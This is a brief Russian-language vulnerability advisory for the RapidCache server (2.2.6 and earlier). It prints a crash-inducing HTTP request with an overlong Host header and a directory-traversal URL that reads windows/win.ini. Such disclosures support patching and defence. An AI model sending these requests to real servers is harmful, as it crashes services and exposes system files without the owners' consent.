Программа: RapidCache 2.2.6 и более ранние версии
Две уязвимости обнаружены в RapidCache. Удаленный пользователь аварийно завершить работу службы. Удаленный пользователь может также просматривать файлы на системе.
Удаленный пользователь может послать HTTP GET запрос с длинным параметром 'Host', чтобы аварийно завершить работу RapidCache сервера. Пример:
GET / HTTP/1.1
Accept: */*..Accept-Language: en-gb
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0
Host:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbb
bbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
bbbbbbbbbbcccccccccccccccccccccc
ccccccccccccccccccccccccccccccccc
cccccccccddddddddddddddddddddd
dddddddddddddddddddddddddddd
dddddddddddddddddddddddddddd
dddddddddddddddddddddddddd
dddddddddddddddddddddeeeee
eeeeeeeBBBBXXX
X:8080
Connection: Keep-Alive
Также сообщается, что удаленный пользователь может представить специально обработанный URL, содержащий '../', чтобы просмотреть произвольные файлы на системе. Пример:
http://127.0.0.1:8080/../../../../../../../../windows/win.ini
